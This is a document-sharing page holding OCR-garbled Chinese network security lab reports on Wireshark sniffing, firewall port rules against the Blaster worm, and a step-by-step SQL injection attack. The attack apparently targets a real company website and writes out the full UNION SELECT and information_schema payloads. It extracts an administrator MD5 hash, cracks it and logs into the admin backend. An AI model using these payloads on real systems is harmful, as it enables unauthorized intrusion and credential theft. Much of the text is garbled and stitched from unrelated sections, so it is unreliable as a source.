《网络安全实验报告综合.docx》由会员分享,可在线阅读,更多相关《网络安全实验报告综合.docx(39页珍藏版)》请在taowenge.com淘文阁网|工程机械CAD图纸|机械工程制图|CAD装配图下载|SolidWorks_CaTia_CAD_UG_PROE_设计图分享下载上搜索。
1、网络扫描与网络嗅探-实验目的(1)理解网络嗅探和扫描器的工作机制和作用(2)使用抓包与协议分析工具Wireshark(3)掌握利用扫描器进行主动探测,收集目标信息的方法(4)掌握使用漏洞扫描器检测远程或本地主机安全性漏洞二实验环境Windows xp操作系统平台,局域网环境,网络抓包与协议分析工具 Wireshark,扫描器软件:Superscan三实验步骤使用Wireshark抓包并进行协议分析(1)下载并安装软件,主界面如图1所示。2)定义IP规则,这里是采用默认情况,如图2所示。低 中 高 扩展自定义自定义工F规则|动作|名称帚西XI216,野始为|协议|方向|对方工p木马/间谍程序防御
2、Worm. BBEagle. m IP木马/间谍程序防御灰鸽子(内网通:工F禁止可疑网码禁止恶意网站- 1禁止恶意网站-2IPIPIP61 .129.112.70. 84.123.5218.83. 153. E允许自己用pin箭令探测耳他机器 ICMP允许路由器返回超时的工CMF回应f 1CMP允许路由器返回无法到达”的工CMP E ICMP任何任何任何防止别人用pin揄令探测ICMP任何程昌方发送到的本地端口号为20742的TCP数据包(这个端口是此蠕虫使 从端口),拦截蠕虫试图从151下载一些可执行程序图23)下图是各个应用程序使用端口的情况,如图3所示。(4)下图就是日志,上面记录了程序
3、访问网络的记录,局域网和互联网上被IP 扫描端口的情况,如图4所示。图4天网防火墙会把所有不合规则的数据包拦截并记录到日志中,如果选择了监 视所有TCP和UDP数据包,那发送和接收的每个数据包都将被记录。如139端 攻击,139端口是NetBIOS协议所使用的端口,在安装了 TCP/IP协议的同时, NetBIOS也会被作为默认设置安装到系统中。(5)防火墙开放端口应用,打开68816889端口。建立新的IP规则,如下图,在自定义IP规则里双击进行新规则设置,如图5所示。增加ip规则数据包协议类型:TCPZJ本地端口r已授权程序开放的端口对方端口从k-到I5TCP标志位匠 FIN ACK p
4、SYN V/ PSH p RST V URG从6881 到6889端口为0时.不作为条件当满足上面条件时I通行ZI同时还审鸵录 r警告 I发声确定取消设置新规则后,把规则上移到该协议组的置顶,并保存。然后可以进行在线端口测试,这些端口是否已经开放的,如图6所示。天网防火塔个人版-xra安全级别:自定义 O低 中 芸 扩展自定义自定义工P规则由爵X旦恸作性称BTTCP禁止所有人连接TCP口口 0DH000000 允许DNS (域名解释)UDP允许已经授权程序打开的端口UDP允许局域网内的机器取你的机器的名称UDP 防止互联网上的机器探测机器名称-1 UDP 允许局域网内的机器取你的机器的名称UD
5、P 防止互联网上的机器探测机器名称-2 UDP 允许DNS (域名解释)UDP西LiLtl凸liLbLtlLtlLtl曲LSI(6)应用自定义规则防止常见病毒。下面是防范冲击波病毒的实例应用,冲 击波就是利用WINDOWS系统的RPC服务漏洞以及开放的69、135、139、445、4444端口入侵。图7就是禁止4444端口的小意图。园增加ip规则数据包协议类型:TCP2J本地端口r已授权程序开放的端口从 |4444到 |4444对方端口从到一TCP标志位V/ FIN r ACK厂SYN 厂PSHF RST 厂 URG端口为0时,不作为条件当满足上面条件时同时还厂鸵录r警告 r发声取消确定封锁6
6、9端口,如图8所示。图8建立完后就保存,保存完后就可以防范冲击波病毒了。六、实验总结通过本次实验,我知道了一般软件防火墙的使用与配置。可以使用该软件监 听各个应用程序使用端口的情况,查看哪些程序使用了端口,使用哪个端口,是 否存在可疑程序在使用网络资源。通过新建IP规则,并且进行自定义,对某些 端口进行封锁,以禁止某些IP访问自己的计算机,之后保存,可以通过此方法 来保证计算机的安全。某网站重置密码漏洞及攻击实例-实验目的(1)理解网站攻击原理(2)理解网络攻击时使用工具的原理(3)熟练使用网站攻击工具实验环境操作系统:Windows 8解密工具:MD5检测工具:啊D浏览器:2345王牌浏览器
7、三实验步骤(1)寻找可以注入网站网址:使用检测工具,啊D扫描注入点,显示如图1所Zo(3) SQL注册检测,扫描表段,显小结果如图2所不。(4)从表段检测字段,检测结果如图3所示。JDilAIM V2.23 无限制版 QQ9269563 I I It 讯AH9 I 除 M9 I 附 讯钝邮后自相扑http/www,d99netnetl一.一皆一;.富一| mil.口渐:1泡】免费注入检测沐人谆摘 bjbinn*l c cn/donetnet啊a注入工热httf/www.d99neLnetUiJlWdilMMnu球股归聆收w- l *-Lf k| !13天猫fl网上超市。秒杀推荐:Links胭9
8、k9k网页游 点Haol23网如意海 看图搜片| 国 inurl:index.php?id=3SS x 广验马集团验马箧团x I .诉0中心打造价值集团,铸就百年品精Io biMd 壮、38 2 groap cmI a hixiored yen the OfardtW?2a -日 N GCMH、HM 6 K新间中心x I . x却牝饮与即然苦穿W用IB/W友宫左WjW 二子星公产亍及卫博立遂X省遐:3W三嗖、二十苍W语事W衣三 派与我正交二亍工,人正、冬花、塔显过三转一9名超水、=.i. r辱基七次把壬名.苧:法彳仔GW现 七次三工三冬六“ 三疑一 迫彳支3省了3孑运6下,设刁一汽宝叁充 70
9、-ifi-甘空对广士0,嘴手代叁餐=当更优“?妄言.彳堂看亍二二 改医=胃亍“仁 汽3H;3W与匕Xhttp:www.ju|jnjpj(!m(ypjpn/news main.php?id=47建I网上超市e秒杀推荐Links雅9k9k网页游鼠Haol23网幻如意漫匚看图搜片inurl:index.php?id=百=素裟马集团x袈马集团打造价值集团,铸就门F品牌To build the value of group.cau a hundred ywn the brand新词中心 NS新闻中心要沼析何行业新低 eSKJMS发布时间您的包A :百我 做g中O 第二步:进一步验证此链接是可以注入的。(
10、与运算)(1)在注入点后加“+and+l = l”页面显示正常,如图3所示。1 http;/wwwjgnmMenieomCT/newsjnaln.php?id=47+and+l=l./天强I网上超市。秒杀推荐L Links昭9k9k网页游鼠Haol23网Q如意海 看图搜片x|骚马集团短马集团联系我们L CONTMTUS.新闻中心 ss切相 as 酬冲o 9tssm北喊马时汽年城店面汨用发同因:2024-03-211006:57N.我不实&宫尊公三七子名.此产产笈区二总之 号第兜.3:eS苞运3%国清戌七.仪否/交七亍二人3、邕汽、*?;电总号一分更毛X、W、珞、于有其正口汽?备.Wk笠三三之三
11、茶W昆尊千父三尊义广老M2W.,义三女E专谡。工定W金:发三W .*.二公年京考-c-j 吉亘=t士线,丁毛于汽三要亍攵mw:s方京w. S*5=jtT: 5S?=ZlSS-5-:j _ 电2 027-R80Z7299 027 R8029781 传M . 027 M0Z72991SSS junfrid jdrrwlT3xovn图3(2)在注入点后加“+and+l=0,页面显示错误,如图4所示。 httpy/wwv? main.php?id=47+and -DS TI网上超市Q秒杀推荐Links履Qk9k网页游行业斩间第三步:获得字段数在注入点后面加入“+order+by+l”,页面显示正常,如
12、图5所示。i天猫F1网上超市 e秒杀推荐Links Wi9k9k网页游 屋Haol23网&如意淹 匚看图搜片( ONFACI US SK1M5边马集团;n -省送:027-M027299027-M029781传H: 027- 88027299*际:JUINTM jdrnnl63.COm新闻中心ZTx mEB一一 1331 一?CMrsl 0T.时您马随用汽车城店面兆租: X14-O3-21100&574三关a君王公司,亡于陵.远子年氏区 m4瑛二谷z wfx文.3套三更、区一方正公费芸陵发 次号奈希交:二子二,人芭、力3、f?息盅三芸一分更复.X、三 誉、子等圣上壬基.惠北出力计为在W隹再产沃
13、区冬衣大型.芸中还 姜月安后芍肃公司建运二二蓑三W :卢兰京吉公W星专 70T5S1生亘七上篁.N弓于京名耍亍纪五石S吉会吉.Wk要+H下:卡套其于工案】853=*:声生:SWm竽及k(2)图5注入点后面换成“+order+by+20”,出现错误界面,如图6所示。I http;/Wwviiiftiiifeiiftjgijynews_maM.php?ld=47+0rder+by+10己8I网上超市。秒杀推荐 Links糜9k9k网页游 鼠Haol23网 5如意海看图慢片inurl:index.php?id=g螃索刀演三案回二臼毂马集团柒团旗党新闻和 志外襄务合作搭造土中义 | tngbih去系物
14、:打造价值集团,铸就I2 build the value of group, cast hundred yran N brand期的长4320 惭同中J 新闻中心发布封同(3)用二分法进一步判断出现错误的字段数,再注入点后面换成:“ +order+by+l 0 ”, “ +order+by+5 ”, “ +order+by+8 ”, “ +order+by+9 ”,页面均显 不正常,说明,正确的字段是123,4,5,6,7,8,9。如图7所不。 乂仟t) main.php?id=s47+order+by+9夕,Si秘 门网上超市。秒杀推荐Links糜9k9k网页游 屋Haol23网 均如翳 匚
15、看图嗖片x验马集团新玩中心电卜业务inurl:index.php?id=_BM$ x 建马集团7TE工XiJw 华画侬X I / 玄务合作招蝌t联系疣门新闻中心 -WS念的as新包中心 复郭后湖腌次布 2014-03-21 1006:57冠笠彳左显有煤公W.位于避 居产开发区.效宏北范 方专区京比.316M或.次一英石公普膜定豉引 次丹信路文汇于此.人汽.三洸 *萼宽堂费士分便珂.电 磐.党等茶花;节三名.呵缶方三发区争殳文缰.至佞釜5SG笑Z有耳公二:发M方汽工. *公E荻有 :cxor 3五外自理.W角子汽主县予fCM斓S有否言.把金县手工下汽主会=沈于16开ml汽左3s生面于522c *
16、第四步:获得显示位再注入点后面加入 “+and+l=2+union+select+123,4,567,8,9”,如图 8 所示, 显示的数字即是显示位:2, 4, 7=L234567899,6 圈ri网建市Q秒杀推荐L Links糜9k9k网页游 屋Haol23网幻如好- 看图搜片x 阕 inurl:inde)cphp?id=百度搜索 x袈马集团弹马集团x 11 . x湾外业务商务合作侬纳士联豺捌J打造价值集团,铸就ri年品牌 To build the value of group.cast a hundred years the brandX新网中心新闻中心 NEWS新闻中心必打位:苜玄 妒
17、亘Q心A臭团新词行的淘图片新词发砌洞:7叵第五步:获得该网站数据库的名字、版本、数据库所在路径等下面是获得数据库信息的一些函数:user()数据库用户名database()当前使用的数据库名version()数据库版本datadir()或datadir数据库数据所在路径65。(1次()或650出数据库安装路径在出错的字段位置加上上面的函数,即可获得相对应的信息,如图9所示3 main.php?id=47+and+l=2+union+select+Luse03Nersion0,5,6, 夕 天猫I网上超市 e秒杀推荐 LI Links糜9k9k网页游 鼠Haol23网 因如意海看图搜片副inur
18、l:indaphp?id=a9。x1验马集团X卜独马集团x J打造价俏集团,镂就门品牌Io Ixjlld the value of gfoup, cat hundred yz lb Band中攵 | English菖贡案比楔5新湿中心海外业务商务合乍招胸士联系我们:时 新闻中心jmjt_flocalhost发布时用:/Vdr/lib/riyujl同CONTACT US钿:027 88027299 027-880297B1传鼻:MSB jMnmd adminQtl第六步:获得当前使用的数据库名的hex值,并暴漏该网站数据库的 字段名(1)数据库名的还原需要使用协助工具:小葵多功能转换工具,把当前
19、使 用的数据库名Jmjt转化为:0x6A6D6A74,转换结果如图10所示。(2)注入点后面加下面的公式获得数据库的字段名:“ +and+l=2+union+select+l,GROUP_CONCAT(DISTINCT+table_name),3,4,5,6,7, 8,9+from+where+table_schema=0x6A6D6A74 (数据库表名的 hex 值) GROUP_CONCAT(DISTINCT+table_name)放在显示位即可获得相对应SQL数据库中的字段名,如图11所示。报表中的具体字段 显示如图12o”文件堂看我3 http:www.junmaren8mcn/new
20、s main.php?id=47+and+l=2+union+select+LGROUP CONCAT(DL. 囹 口天猫I网上超市。秒杀推荐 D Links糜9k9k网页游 Haol23网 均如意海 匚1看图搜片验马集团x 国百度下,你就1X 。.。的空间http:25. xj圈百度一下,你炳1道x打造价值集团,铸就品牌新闻中心NEWS新闻中心To build the value of group cast a hundred years the brand伊%JE :百页 所说中心、发布时司:7圜4图11hq_gsgLhqxwm,hq_news,hq_useradmin,hq_ware,h
21、q_web,jm_hr,jm_hr_jLjm_hr_sortJmJtgLjmxwmJm_new5,jm_news_sortJm_syimg,jm_yqlj,useradmin,、,useradmin,web,xnfy520junmajituan_address,xnfy520Junmajituan_advert_category,xnfy520Junmajituan_advertJist,xnfy520Junmajituan_brand,xnfy520Junmajituan_car,:,xnfy520Junmajituan_advert_listfxnfy520Junmajituan_bran
22、dlxnfy520Junmajituan_car,xnfy520Junmajituan_color,xnfy520Junmajituan_exe第七步:在所有的字段中找数据库管理员的用户名,并获得hex值找到管理员的字段名(管理员:administrator)猜测:这个很显然就判断是useradmin (大多数),因为大多数人都是admin、 user、Pass等一些常用单词搭配一起标记。把管理员的字段名再次使用小葵多功能转换工具获得其hex值,如图13所 Zo新闻中心NEWS集团S近行岬笈零片新温:打造价值集团,铸就ii年品牌To build th。value of group,新闻中心K
23、| English期概莫硒用0海外峥商务合作招受虹联至我(00 7te(Y)您的B -艺灵 新宜中心,发布时问:7CONTACT US电运:,专真:H4第八步:借助管理员用户名的hex值,获得字段useradmin的子字段注入点后面加下面公式获得管理员的子字段:a+and+l=2+union+select+l,concat(GROUP_CONCAT(DISTINCT+column_name) ),3,4,5,6,7,8,9+from+where+table_name=0x61646D696E (管理员用户名的 hex 值)concat(GROUP_CONCAT(DISTINCT+column_
24、name)放在显示位获得的子字段显示如图14所示。I http:wwwJunmaren main.php?id=47+and+l=2+union+select+LcorKat(GROUP CO /臼)(圈 :全Si天|网上超市。秒杀推荐L Links Wi9k9k网页游Haol23网&J如意海看图溟片里马集团(4) TCP三次握手过程分析(以第一次握手为例)主机0发送一个连接请求到(),第一个TCP包的格式如图4所示。Filter: | tcp | Expression.Clear ApplyTime(Source(Destinati on(Protocol |Length|lno工Uz. y
25、yyzuub4HTTPS4Lget nttp :/ww. nao-1106TCP622804-8080 SYNse1 107TCP628080-2804 SYN,AC108TCP542804*8080 ACKse109HTTP588GET 。110TCP1514TCP segment ofa111TCP1514TCP segment ofa112TCP542804-8080 ACKse11勺17 41H744n1 77 1 A n 11 77 1 A 1 A4ITCP1 S1 4Ftcp : pnttipnr cfS Frame 106: 62 bytes on wire (496 bits)
26、, 62 bytes captured (496 bits) on interface 0S Ethernet II, Src: f8:0f:41:6f:ed:0e (f8:Of:41:6f:ed:Oe), Dst: 00:le:c9:ae:8e:ea (00:1 国 Internet Protocol version 4, Src: 172.16.1.64 (172.16.1.64), Dst: 172.16.0.1 (172.16. + Transmission control Protocol, src Port: 2804 (2804), Dst Port: 8080 (8080),
27、seq: 0,4Ij00000010002000306 a 4 0 2 0 8 0 3 2 f 8 3 o a o o o eo9o e of o8 4 10 ea 4 4 a 5 f 5 9b ad c 3 o o eolf 13 of o oof o oof0 0 2 olo 5 c o 4 3 7 0 0 0 2 0 4 0 0 8 10 4 o o o o e o o 1 o 1 o o d c o 1 e a o o feob 4 obb 10 7 54 Ob o AO.o;z. .T图4第三行是ipv4的报文,网际协议IP是工作在网络层,也就是数据链路层的上层, IPv4报文中的源
28、地址和目的地址是ip地址,版本号TCP是6,其格式为如图5所2JI2J+ ETTTBTTTeT-TTbrc ;-i b ; ui :4_l ; 5 ; TU ; (J b ; ui ; bl ; TU : uEJ,ub l i-uU:j匕- 耐新闻中心三NEWSadminadmin 发刊报:7开始载图(Y)bla9337bc2elab6bd832*02ci92ab6图片新闻图15第十步:进一步把十六进制显示的密码的密文进行解密使用下面的MD5解密工具的链接把密码的密文解密,使用网址:或者,把 十六进制显示的密码的密文输入编辑查询框中进行查询,查询结果如图16所示。 使IVIUJ Zx。 5VI
29、LO乐市史WT , 口5更J余就至g异力,史初J壬部用L效牯口,前HgD反is卦邺相。输入让你无语的MD5“幅越图(Y)声明:责任:本站所提供的信息、技术及服务仅可用于信息安全评估和受码学研究,严禁用于非法用途,如有违反本站不承担任何责任!旨)困削E1狙 击I:舒羽”以爵吻词恭喜,该密文已被SOMD5解密!明文88027299此明文由,Hg4nmKH4(K提交取美丽勺缘/ 用食1 0小费图16最后一步:使用“啊D”工具扫描后台,(1)打开“啊D”工具,点击“管理入口”进行扫描(2)找到管理员的登陆界面如图17所示,输入账号和密码可进入该网站的后台如图18所不。登陆信息网后台管理乐点创意科技有限公司Ledi anchuangyi kej iyoux iangongsi1-时间造就我们,最优秀实力